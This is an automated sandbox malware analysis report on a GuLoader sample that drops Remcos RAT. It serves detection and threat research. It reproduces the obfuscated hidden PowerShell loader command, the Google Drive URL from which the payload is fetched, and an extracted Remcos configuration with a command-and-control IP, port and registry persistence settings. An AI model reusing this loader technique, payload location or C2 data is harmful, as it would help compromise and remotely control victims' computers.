Windows Analysis Report
WtZl31OLfA.exe

Overview

General Information

Sample name:WtZl31OLfA.exe
renamed because original name is a hash value
Original sample name:293ebd610b0542289ffe9a52cab2c2a434dcff94918045a5ed1497deaee5eb87.exe
Analysis ID:1588308
MD5:74c8f736d425b1bd2027c2b5b144e188
SHA1:76f160d6c55611b99dcd10f85889957cb867990a
SHA256:293ebd610b0542289ffe9a52cab2c2a434dcff94918045a5ed1497deaee5eb87
Tags: exe, GuLoader, user-adrian__luca

Detection

Remcos, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected Remcos RAT
Early bird code injection technique detected
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Remcos RAT
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found suspicious powershell code related to unpacking or dynamic code loading
Hides threads from debuggers
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Powershell drops PE file
Queues an APC in another process (thread injection)
Suspicious powershell command line found
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • WtZl31OLfA.exe (PID: 4508 cmdline: "C:\Users\user\Desktop\WtZl31OLfA.exe" MD5: 74C8F736D425B1BD2027C2B5B144E188)
    • powershell.exe (PID: 4396 cmdline: powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) " MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 4764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 7060 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos

Name: CloudEyE, GuLoader
Description: CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
{"Host:Port:Password": ["87.120.116.187:56:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GC7VQU", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp | Rule: JoeSecurity_Remcos | Description: Yara detected Remcos RAT | Author: Joe Security
Source: 00000001.00000002.2297304332.000000000A291000.00000040.00001000.00020000.00000000.sdmp | Rule: JoeSecurity_GuLoader_2 | Description: Yara detected GuLoader | Author: Joe Security

            System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 142.250.185.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 7060, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49396
Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4396, TargetFilename: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe
Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) ", CommandLine: powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) ", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\WtZl31OLfA.exe", ParentImage: C:\Users\user\Desktop\WtZl31OLfA.exe, ParentProcessId: 4508, ParentProcessName: WtZl31OLfA.exe, ProcessCommandLine: powershell.exe -windowstyle hidden "$Ekstremumspunktet32=gc -raw 'C:\Users\user\AppData\Local\neoimpressionism\Arbejdsbesparelsernes40\Kbmand.Too';$byelaws=$Ekstremumspunktet32.SubString(71187,3);.$byelaws($Ekstremumspunktet32) ", ProcessId: 4396, ProcessName: powershell.exe

            Stealing of Sensitive Information

Source: Registry Key set | Author: Joe Security | Data: Details: 0C CC C1 61 31 11 4E AB 6F CE 7F C0 69 31 34 57 0E 18 3A 8A 18 8C 62 A9 78 E5 7F 4F 8D 96 57 F7 D1 36 53 05 75 7C DE 3A 35 13 31 9A E8 47 44 C1 5E 6E FA 7E 8E 6D 62 03 BB 92 05 86 E5 98 45 FD , EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\msiexec.exe, ProcessId: 7060, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Rmc-GC7VQU\exepath
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-01-10T23:50:06.400374+0100 | 2803270 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49396 | 142.250.185.78 | 443 | TCP

            AV Detection

            Source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": ["87.120.116.187:56:0"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-GC7VQU", "Keylog flag": "0", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": ""}
Source: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe | ReversingLabs: Detection: 57%
Source: WtZl31OLfA.exe | ReversingLabs: Detection: 57%
Source: WtZl31OLfA.exe | Virustotal: Detection: 71% (Perma Link)
Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7060, type: MEMORYSTR
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.3% probability
Source: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe | Joe Sandbox ML: detected
Source: WtZl31OLfA.exe | Joe Sandbox ML: detected
Source: WtZl31OLfA.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.5:49396 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.5:49406 version: TLS 1.2
Source: WtZl31OLfA.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: %eqm.Core.pdb source: powershell.exe, 00000001.00000002.2296178864.00000000088A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: indows\System.Core.pdbl source: powershell.exe, 00000001.00000002.2296178864.00000000088A4000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000001.00000002.2296384908.00000000088BF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00405841 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405841
Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_004027FB FindFirstFileW,0_2_004027FB
Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00406393 FindFirstFileW,FindClose,0_2_00406393

            Networking

            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49440 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49457 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49473 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49492 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49508 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49528 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49545 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49561 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49582 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49600 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49620 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49636 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49641 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49638 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49642 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49643 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49635 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49639 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49632 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49648 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49652 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49647 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49646 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49672 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49660 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49673 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49676 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49649 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49658 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49655 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49651 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49682 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49659 -> 87.120.116.187:56
            Source: Network trafficSuricata IDS: 2032776 - Severity 1 - ET MALWARE Remcos 3.x Unencrypted Checkin : 192.168.2.5:49695 -> 87.120.116.187:56
            Source: Malware configuration extractor | IPs: 87.120.116.187
            Source: global traffic | TCP traffic: 192.168.2.5:49440 -> 87.120.116.187:56
            Source: global traffic | TCP traffic: 192.168.2.5:49353 -> 1.1.1.1:53
            Source: Joe Sandbox View | ASN Name: UNACS-AS-BG8000BurgasBG
            Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.5:49396 -> 142.250.185.78:443
            Source: global traffic | HTTP traffic detected:
                GET /uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                Host: drive.google.com
                Cache-Control: no-cache
            Source: global traffic | HTTP traffic detected:
                GET /download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download HTTP/1.1
                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                Cache-Control: no-cache
                Host: drive.usercontent.google.com
                Connection: Keep-Alive
            Source: unknown | TCP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknown | TCP traffic detected without corresponding DNS query: 87.120.116.187
            Source: global traffic | DNS traffic detected: DNS query: drive.google.com
            Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
            Source: WtZl31OLfA.exe, WtZl31OLfA.exe.1.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: powershell.exe, 00000001.00000002.2281239821.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: WtZl31OLfA.exe, WtZl31OLfA.exe.1.dr | String found in binary or memory: http://www.skinstudio.netG
            Source: powershell.exe, 00000001.00000002.2281239821.0000000004EF1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore6lBeq
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://apis.google.com
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/
            Source: msiexec.exe, 00000005.00000002.4514868959.0000000020D60000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/uc?export=download&id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkXr
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/;
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/A
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=download(
            Source: msiexec.exe, 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2353244665.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://drive.usercontent.google.com/download?id=1Y8wNX0Y_p72krbO6gQOeTxW-JyyjkgkX&export=downloadF
            Source: powershell.exe, 00000001.00000002.2281239821.0000000005046000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
            Source: powershell.exe, 00000001.00000002.2284136965.0000000005F59000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ssl.gstatic.com
            Source: msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.google.com/translate_a/element.js
            Source: msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
            Source: msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com/analytics.js
            Source: msiexec.exe, 00000005.00000003.2314705154.0000000005DD2000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google-analytics.com;report-uri
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.google.com
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.googletagmanager.com
            Source: msiexec.exe, 00000005.00000003.2314994580.0000000005E14000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000005.00000003.2314910049.0000000005DE0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.gstatic.com
            Source: unknown | Network traffic detected: HTTP traffic on port 49406 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49396
            Source: unknown | Network traffic detected: HTTP traffic on port 49396 -> 443
            Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49406
            Source: unknown | HTTPS traffic detected: 142.250.185.78:443 -> 192.168.2.5:49396 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 172.217.16.129:443 -> 192.168.2.5:49406 version: TLS 1.2
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_004052EE GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard

            E-Banking Fraud

            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DC5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005D6A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DAC000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.4503566716.0000000005DD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: Process Memory Space: msiexec.exe PID: 7060, type: MEMORYSTR

            System Summary

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\neoimpressionism\Vekselformular\WtZl31OLfA.exe
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_004032A0 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | File created: C:\Windows\resources\0809
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | File created: C:\Windows\resources\0809\relegationen
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | File created: C:\Windows\resources\0809\relegationen\ernringseksperternes
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00407040
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00406869
            Source: C:\Users\user\Desktop\WtZl31OLfA.exe | Code function: 0_2_00404B2B
